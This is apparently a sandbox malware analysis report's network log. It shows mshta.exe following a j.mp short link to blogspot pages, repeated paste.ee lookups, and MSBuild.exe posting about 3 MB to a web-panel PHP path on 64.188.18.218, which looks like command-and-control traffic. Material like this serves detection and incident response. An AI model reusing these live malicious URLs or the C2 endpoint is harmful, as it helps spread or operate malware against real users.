Jan 13, 2021 13:44:28.587493896 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:28.644560099 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:28.651949883 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:28.700452089 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:29.015083075 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:29.071233988 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:31.369704962 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:31.433773041 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:31.619276047 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:31.686795950 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:31.687319040 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:31.746385098 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:33.324801922 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:33.381355047 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:35.042046070 CET | 57564 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:35.098671913 CET | 53 | 57564 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:39.305635929 CET | 63009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:39.362576962 CET | 53 | 63009 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:39.365454912 CET | 59319 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:39.424384117 CET | 53 | 59319 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:40.186141014 CET | 53070 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:40.197665930 CET | 59770 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:40.242908955 CET | 53 | 53070 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:40.245507956 CET | 53 | 59770 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:40.247988939 CET | 61523 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:40.305908918 CET | 53 | 61523 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:40.971148968 CET | 62791 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:41.027657986 CET | 53 | 62791 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:41.990853071 CET | 50667 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:41.991761923 CET | 54129 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:44:42.039572001 CET | 53 | 54129 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 13:44:42.057894945 CET | 53 | 50667 | 8.8.8.8 | 192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.801377058 CET6532953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.859409094 CET53653298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.811579943 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.877253056 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.878504038 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938445091 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938976049 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:47.003381014 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.897459030 CET4915753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.962050915 CET53491578.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:50.289427996 CET5739153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:50.346026897 CET53573918.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.222888947 CET6185853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.287549019 CET53618588.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.813502073 CET6250053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.869791985 CET53625008.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.872222900 CET5165253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.936516047 CET53516528.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.485379934 CET6276253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.560195923 CET53627628.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.310018063 CET5690553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.366463900 CET53569058.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:57.509673119 CET5460953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:57.576920986 CET53546098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.749346018 CET5810153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.816950083 CET53581018.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.978214979 CET6432953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.037471056 CET53643298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.609417915 CET6432953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.670631886 CET53643298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.117901087 CET6488153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.182449102 CET53648818.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.183072090 CET6488153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.239538908 CET53648818.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.281723976 CET5532753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.338166952 CET53553278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:06.696155071 CET5915053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:06.755399942 CET53591508.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.640511990 CET6343953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.699605942 CET53634398.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.707274914 CET6504053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.768819094 CET53650408.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.290165901 CET6136953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.338649988 CET53613698.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.340930939 CET6551553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.399693012 CET53655158.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.629877090 CET6023653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.686925888 CET53602368.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:18.564466953 CET5319853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:18.628879070 CET53531988.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.097852945 CET5002753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.157201052 CET53500278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.104094982 CET5924553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.164253950 CET53592458.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.302629948 CET5584053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.358843088 CET53558408.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.362325907 CET6166753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.418745995 CET53616678.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.561464071 CET6373653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.620728016 CET53637368.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.614391088 CET5980553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.625468016 CET6232253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.673316956 CET53623228.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.678914070 CET53598058.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.878982067 CET5281953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.883483887 CET5121553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.926867962 CET53528198.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.947478056 CET53512158.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.672183037 CET6031253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.728512049 CET53603128.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.670972109 CET6346353192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.729955912 CET53634638.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.219335079 CET6222453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.276051044 CET53622248.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.234687090 CET5906453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.293833971 CET53590648.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.579821110 CET5988553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.636311054 CET53598858.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.638029099 CET6374953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.688711882 CET53637498.8.8.8192.168.2.22

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 13, 2021 13:45:29.676234961 CET | 192.168.2.22 | 8.8.8.8 | d064 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 13:44:22.673477888 CET | 192.168.2.22 | 8.8.8.8 | 0xc2c0 | Standard query (0) | j.mp | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:23.009288073 CET | 192.168.2.22 | 8.8.8.8 | 0x1dea | Standard query (0) | mainjigijigi123.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:24.424066067 CET | 192.168.2.22 | 8.8.8.8 | 0xbb68 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:24.489990950 CET | 192.168.2.22 | 8.8.8.8 | 0xbb68 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:25.648607969 CET | 192.168.2.22 | 8.8.8.8 | 0x1000 | Standard query (0) | resources.blogblog.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:29.015083075 CET | 192.168.2.22 | 8.8.8.8 | 0x9210 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:31.619276047 CET | 192.168.2.22 | 8.8.8.8 | 0x6e0b | Standard query (0) | randikhanaekminar.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:31.687319040 CET | 192.168.2.22 | 8.8.8.8 | 0x6e0b | Standard query (0) | randikhanaekminar.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:33.324801922 CET | 192.168.2.22 | 8.8.8.8 | 0x605a | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:40.186141014 CET | 192.168.2.22 | 8.8.8.8 | 0xb851 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:40.971148968 CET | 192.168.2.22 | 8.8.8.8 | 0xca10 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:46.811579943 CET | 192.168.2.22 | 8.8.8.8 | 0xd0e2 | Standard query (0) | backbones1234511a.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:46.878504038 CET | 192.168.2.22 | 8.8.8.8 | 0xd0e2 | Standard query (0) | backbones1234511a.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:46.938976049 CET | 192.168.2.22 | 8.8.8.8 | 0xd0e2 | Standard query (0) | backbones1234511a.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:48.897459030 CET | 192.168.2.22 | 8.8.8.8 | 0x8474 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:54.222888947 CET | 192.168.2.22 | 8.8.8.8 | 0x10e9 | Standard query (0) | startthepartyup.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:55.485379934 CET | 192.168.2.22 | 8.8.8.8 | 0xa9e8 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:56.310018063 CET | 192.168.2.22 | 8.8.8.8 | 0x863c | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:03.117901087 CET | 192.168.2.22 | 8.8.8.8 | 0xf89f | Standard query (0) | ghostbackbone123.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:03.183072090 CET | 192.168.2.22 | 8.8.8.8 | 0xf89f | Standard query (0) | ghostbackbone123.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:05.281723976 CET | 192.168.2.22 | 8.8.8.8 | 0x3e66 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:16.629877090 CET | 192.168.2.22 | 8.8.8.8 | 0x25b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:24.097852945 CET | 192.168.2.22 | 8.8.8.8 | 0xffd | Standard query (0) | backbones1234511a.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:25.104094982 CET | 192.168.2.22 | 8.8.8.8 | 0x8ed6 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:26.561464071 CET | 192.168.2.22 | 8.8.8.8 | 0x446f | Standard query (0) | paste.ee | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:32.672183037 CET | 192.168.2.22 | 8.8.8.8 | 0x565e | Standard query (0) | startthepartyup.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:33.670972109 CET | 192.168.2.22 | 8.8.8.8 | 0xe20 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:41.219335079 CET | 192.168.2.22 | 8.8.8.8 | 0x7a65 | Standard query (0) | ghostbackbone123.blogspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:42.234687090 CET | 192.168.2.22 | 8.8.8.8 | 0x5a54 | Standard query (0) | www.blogger.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 13:44:22.722846985 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | No error (0) | j.mp | | 67.199.248.16 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:22.722846985 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | No error (0) | j.mp | | 67.199.248.17 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:23.073410034 CET | 8.8.8.8 | 192.168.2.22 | 0x1dea | No error (0) | mainjigijigi123.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:23.073410034 CET | 8.8.8.8 | 192.168.2.22 | 0x1dea | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:24.489083052 CET | 8.8.8.8 | 192.168.2.22 | 0xbb68 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:24.548269987 CET | 8.8.8.8 | 192.168.2.22 | 0xbb68 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:25.715763092 CET | 8.8.8.8 | 192.168.2.22 | 0x1000 | No error (0) | resources.blogblog.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:29.071233988 CET | 8.8.8.8 | 192.168.2.22 | 0x9210 | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:29.071233988 CET | 8.8.8.8 | 192.168.2.22 | 0x9210 | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:29.071233988 CET | 8.8.8.8 | 192.168.2.22 | 0x9210 | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:31.686795950 CET | 8.8.8.8 | 192.168.2.22 | 0x6e0b | No error (0) | randikhanaekminar.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:31.686795950 CET | 8.8.8.8 | 192.168.2.22 | 0x6e0b | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:31.746385098 CET | 8.8.8.8 | 192.168.2.22 | 0x6e0b | No error (0) | randikhanaekminar.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:31.746385098 CET | 8.8.8.8 | 192.168.2.22 | 0x6e0b | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:33.381355047 CET | 8.8.8.8 | 192.168.2.22 | 0x605a | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:40.242908955 CET | 8.8.8.8 | 192.168.2.22 | 0xb851 | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:40.242908955 CET | 8.8.8.8 | 192.168.2.22 | 0xb851 | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:40.242908955 CET | 8.8.8.8 | 192.168.2.22 | 0xb851 | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:41.027657986 CET | 8.8.8.8 | 192.168.2.22 | 0xca10 | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:41.027657986 CET | 8.8.8.8 | 192.168.2.22 | 0xca10 | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:41.027657986 CET | 8.8.8.8 | 192.168.2.22 | 0xca10 | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:46.877253056 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | backbones1234511a.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:46.877253056 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:46.938445091 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | backbones1234511a.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:46.938445091 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:47.003381014 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | backbones1234511a.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:47.003381014 CET | 8.8.8.8 | 192.168.2.22 | 0xd0e2 | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:48.962050915 CET | 8.8.8.8 | 192.168.2.22 | 0x8474 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:54.287549019 CET | 8.8.8.8 | 192.168.2.22 | 0x10e9 | No error (0) | startthepartyup.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:44:54.287549019 CET | 8.8.8.8 | 192.168.2.22 | 0x10e9 | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:55.560195923 CET | 8.8.8.8 | 192.168.2.22 | 0xa9e8 | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:55.560195923 CET | 8.8.8.8 | 192.168.2.22 | 0xa9e8 | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:55.560195923 CET | 8.8.8.8 | 192.168.2.22 | 0xa9e8 | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:44:56.366463900 CET | 8.8.8.8 | 192.168.2.22 | 0x863c | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:03.182449102 CET | 8.8.8.8 | 192.168.2.22 | 0xf89f | No error (0) | ghostbackbone123.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:03.182449102 CET | 8.8.8.8 | 192.168.2.22 | 0xf89f | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:03.239538908 CET | 8.8.8.8 | 192.168.2.22 | 0xf89f | No error (0) | ghostbackbone123.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:03.239538908 CET | 8.8.8.8 | 192.168.2.22 | 0xf89f | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:05.338166952 CET | 8.8.8.8 | 192.168.2.22 | 0x3e66 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:16.686925888 CET | 8.8.8.8 | 192.168.2.22 | 0x25b | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:16.686925888 CET | 8.8.8.8 | 192.168.2.22 | 0x25b | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:16.686925888 CET | 8.8.8.8 | 192.168.2.22 | 0x25b | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:24.157201052 CET | 8.8.8.8 | 192.168.2.22 | 0xffd | No error (0) | backbones1234511a.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:24.157201052 CET | 8.8.8.8 | 192.168.2.22 | 0xffd | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:25.164253950 CET | 8.8.8.8 | 192.168.2.22 | 0x8ed6 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:26.620728016 CET | 8.8.8.8 | 192.168.2.22 | 0x446f | No error (0) | paste.ee | | 104.18.49.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:26.620728016 CET | 8.8.8.8 | 192.168.2.22 | 0x446f | No error (0) | paste.ee | | 104.18.48.20 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:26.620728016 CET | 8.8.8.8 | 192.168.2.22 | 0x446f | No error (0) | paste.ee | | 172.67.219.133 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:32.728512049 CET | 8.8.8.8 | 192.168.2.22 | 0x565e | No error (0) | startthepartyup.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:32.728512049 CET | 8.8.8.8 | 192.168.2.22 | 0x565e | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:33.729955912 CET | 8.8.8.8 | 192.168.2.22 | 0xe20 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:41.276051044 CET | 8.8.8.8 | 192.168.2.22 | 0x7a65 | No error (0) | ghostbackbone123.blogspot.com | blogspot.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 13:45:41.276051044 CET | 8.8.8.8 | 192.168.2.22 | 0x7a65 | No error (0) | blogspot.l.googleusercontent.com | | 108.177.127.132 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:45:42.293833971 CET | 8.8.8.8 | 192.168.2.22 | 0x5a54 | No error (0) | www.blogger.com | blogger.l.google.com | | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

• j.mp
• 64.188.18.218

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 67.199.248.16 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:44:22.788650990 CET | 0 | OUT | GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: j.mp
  Connection: Keep-Alive
Jan 13, 2021 13:44:22.931399107 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
  Server: nginx
  Date: Wed, 13 Jan 2021 12:44:22 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 137
  Cache-Control: private, max-age=90
  Location: https://mainjigijigi123.blogspot.com/p/st2222.html
  Set-Cookie: _bit=l0dcIm-10c992d95c13237e4b-003; Domain=j.mp; Expires=Mon, 12 Jul 2021 12:44:22 GMT
  Via: 1.1 google
  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6a 69 67 69 6a 69 67 69 31 32 33 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 70 2f 73 74 32 32 32 32 2e 68 74 6d 6c 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
  Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://mainjigijigi123.blogspot.com/p/st2222.html">moved here</a></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49197 | 64.188.18.218 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:44:58.951586962 CET | 3086 | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
